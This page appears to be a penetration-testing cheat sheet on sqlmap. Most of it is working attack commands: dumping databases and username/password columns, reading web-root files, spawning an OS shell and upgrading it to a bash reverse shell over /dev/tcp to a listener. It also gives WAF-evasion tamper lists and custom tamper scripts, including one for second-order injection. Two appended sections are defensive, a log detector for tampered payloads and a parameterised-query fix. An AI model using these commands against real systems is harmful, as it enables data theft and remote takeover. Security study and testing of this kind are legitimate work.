SQL Injection with Sqlmap
Last modified: 2023-02-10
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This page shows how to perform SQL injection with sqlmap.
Basic Commands
# GET request
sqlmap -u "http://<target-ip>/?search=test"
# -p: target parameter
sqlmap -u "http://<target-ip>/?category=test&item=1" -p item
# Header param injection
sqlmap -u "https://example.com/?search=test" --headers "X-Forwarded-For: 1*"
# POST request
sqlmap -u "http://<target-ip>" --data="username=test&password=test"
Using Request File
We can pass a request file saved from Burp Suite to sqlmap with the "-r" flag.
sqlmap -r request.txt
sqlmap -r request.txt --dump --dbs --tables --columns --random-agent
sqlmap -r request.txt --dump --dbms mysql --risk 3 --level 5
# --fresh-queries: ignore query results cached in the session file and query the tables again
sqlmap -r request.txt --fresh-queries
# --current-user: Retrieve current user
sqlmap -r request.txt --current-user
# --current-db: Retrieve current DB
sqlmap -r request.txt --current-db
# Specify database name, table name, column name
sqlmap -r request.txt -D database_name -T table_name -C column_name
# Specify multiple columns
sqlmap -r request.txt -D database_name -T table_name -C username,password
# --technique U: Union attack
# --delay 2: Time delay
sqlmap -r request.txt --technique U --delay 2
# --technique T: Time-based Blind SQLi
sqlmap -r request.txt --technique T
# --time-sec: Sleep time for Time-Based Blind SQLi
sqlmap -r request.txt --time-sec 2
# --ignore-code: Ignore a specific HTTP status code in responses (e.g. 401)
sqlmap -r request.txt --ignore-code 401
# --dump-all: Dump all database table entries
sqlmap -r request.txt --dump-all
Web Shell
Add the "--os-shell" option to interact with a web shell.
sqlmap -u "http://<target-ip>" --cookie="value=*" --os-shell
Once it is active, you may want to upgrade to a fully functional shell. You can do that with a reverse shell.
On your local machine:
nc -lvnp 4444
Then execute the following command in the web shell.
os-shell> bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'
Read Files
# --batch: never ask for user input, use the default behavior
sqlmap -r request.txt --file-read "/var/www/html/index.php" --time-sec 10 --batch
sqlmap -r request.txt --file-read "/var/www/<subdomain>/index.php" --time-sec 10 --batch
sqlmap -u "http://<target-ip>/?q=test" --file-read "/var/www/html/index.php" --time-sec 10 --batch
Tamper
sqlmap payloads can be modified with tamper scripts, either the ones bundled with sqlmap or a custom Python script such as tamper.py.
WAF (Web Application Firewall) Bypass
This post explains what each tamper module does.
# General
sqlmap -r request.txt --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
# MSSQL
sqlmap -r request.txt --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
# MySQL
sqlmap -r request.txt --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
Custom tamper modules (Base64 encode)
We can also write our own modules. For instance, create "tamper.py":
```python
#!/usr/bin/python3
# Custom sqlmap tamper script: Base64-encodes every payload before it is sent.
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

# Priority decides the order in which sqlmap applies several tamper scripts.
__priority__ = PRIORITY.NORMAL


def dependencies():
    # Called once by sqlmap; used to warn about required DBMS/versions. Nothing needed here.
    pass


def tamper(payload, **kwargs):
    # sqlmap calls this for every payload; return the transformed string.
    return encodeBase64("%s" % payload, binary=False)
```
Then execute sqlmap.
# The tamper is a module, so we need to create __init__.py in the current directory.
touch __init__.py
sqlmap -u "https://example.com/" --cookie "session=*" --tamper=tamper.py
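The WAF bypass lists above and the custom Base64 tamper have a defensive counterpart: reviewing access logs after undoing those same transformations, so that randomcase, space2comment, percent-encoding or base64 do not hide the keywords. The following detector is an added example, not part of the original page or of sqlmap; the log lines are constructed, and the keyword pattern, the 8-character base64 minimum and the combined-log format are assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote

# Conservative keyword pattern, applied only to values after normalisation.
SQLI_PATTERN = re.compile(
    r"\bunion\b\s+(?:all\s+)?select\b|\bor\b\s+\d+\s*=\s*\d+|\b(?:sleep|benchmark)\s*\(|'\s*or\s*'",
    re.IGNORECASE,
)
# Constructed sample access-log lines (not real traffic); lines 2 and 3 carry tampered payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Feb/2023:10:00:01 +0000] "GET /?search=test HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Feb/2023:10:00:02 +0000] "GET /?search=test%27/**/UnIoN/**/aLl/**/SeLeCt/**/1,2,3-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Feb/2023:10:00:03 +0000] "GET /?search=dGVzdCcgT1IgMT0xLS0g HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Feb/2023:10:00:04 +0000] "GET /?category=books&item=1 HTTP/1.1" 200 512',
]

def try_base64(value):
    """Return the decoded text if value is base64 of printable UTF-8, else value unchanged."""
    if len(value) < 8 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return value
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return value
    return decoded if decoded.isprintable() else value

def normalize(value):
    """Undo the transformations of the tamper scripts listed above before keyword matching."""
    v = unquote(value)                                            # chardoubleencode / percentage
    v = re.sub(r"%u00([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), v)  # charunicodeencode
    v = try_base64(v)                                             # base64encode / custom tamper
    v = re.sub(r"/\*.*?\*/", " ", v)                              # space2comment
    v = re.sub(r"\s+", " ", v)                                    # multiplespaces / space2randomblank
    return v.lower()                                              # randomcase

def suspicious_params(query_string):
    # parse_qsl already URL-decodes once and turns '+' into a space (space2plus).
    return [k for k, v in parse_qsl(query_string, keep_blank_values=True)
            if SQLI_PATTERN.search(normalize(v))]

def scan_log(lines):
    """Return (line_no, [param, ...]) for each access-log line whose query string looks tampered."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) \S*?\?(\S*) HTTP/', line)
        params = suspicious_params(m.group(1)) if m else []
        if params:
            hits.append((no, params))
    return hits
```

Run against the sample, only the two tampered lines are reported, each on the "search" parameter; tune SQLI_PATTERN to your application before using it on real logs.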
Multiple Requests
```python
#!/usr/bin/python3
# Tamper script for a second-order injection: every payload is first registered
# as a username via /signup, then used to log in so that the Cookie header
# sqlmap sends to --second-url belongs to that freshly created account.
import requests
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

address = "http://vulnerable.com"
password = "test"


def dependencies():
    pass


def create_account(payload):
    # Register an account whose username is the raw payload.
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        s.post(f"{address}/signup", data=data)


def login(payload):
    # Log in as that account and return a Cookie header value for its session.
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        s.post(f"{address}/login", data=data)
        sessid = s.cookies.get("session", None)
        return "session={}".format(sessid)


def tamper(payload, **kwargs):
    # sqlmap passes its request headers in kwargs; replacing the Cookie header here
    # makes the follow-up request to --second-url run under the new account.
    headers = kwargs.get("headers", {})
    create_account(payload)
    headers["Cookie"] = login(payload)
    return payload
```
Then run sqlmap with the tamper option.
sqlmap --tamper tamper.py --url http://vulnerable.com/signup --data "username=admin&password=test" --second-url "http://vulnerable.com/post" --no-cast
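The tamper above exercises a second-order injection: the payload is stored at /signup and only reaches a query later, on the --second-url page. As an added example that is not from the original page, a minimal sqlite3 model of that flow shows why a parameterised signup alone does not help and what the fix looks like; the schema, table contents and the sample username are constructed for this illustration.

```python
import sqlite3


def setup():
    """In-memory schema mirroring the signup / login / post flow (constructed for this example)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
        CREATE TABLE posts (id INTEGER PRIMARY KEY, username TEXT, body TEXT);
        INSERT INTO posts (username, body) VALUES ('alice', 'alice private note');
        INSERT INTO posts (username, body) VALUES ('bob', 'bob private note');
    """)
    return db


def signup(db, username, password):
    """Signup is parameterised: the payload is stored verbatim without error, so no first-order SQLi."""
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))


def current_username(db, user_id):
    return db.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()[0]


def posts_vulnerable(db, user_id):
    """Second-order SQLi: the stored username is trusted and concatenated into the later query."""
    name = current_username(db, user_id)
    sql = "SELECT body FROM posts WHERE username = '%s'" % name
    return [row[0] for row in db.execute(sql)]


def posts_fixed(db, user_id):
    """Fix: bind the value even though it came from our own database."""
    name = current_username(db, user_id)
    return [row[0] for row in db.execute("SELECT body FROM posts WHERE username = ?", (name,))]


def demo():
    """Store a constructed username at signup, then query posts both ways; returns (vulnerable, fixed)."""
    db = setup()
    signup(db, "x' OR '1'='1", "test")
    uid = db.execute("SELECT id FROM users WHERE password = 'test'").fetchone()[0]
    return posts_vulnerable(db, uid), posts_fixed(db, uid)
```

The vulnerable query returns every user's posts for the stored username, while the bound query returns none, which is the behaviour sqlmap's --second-url run is looking for.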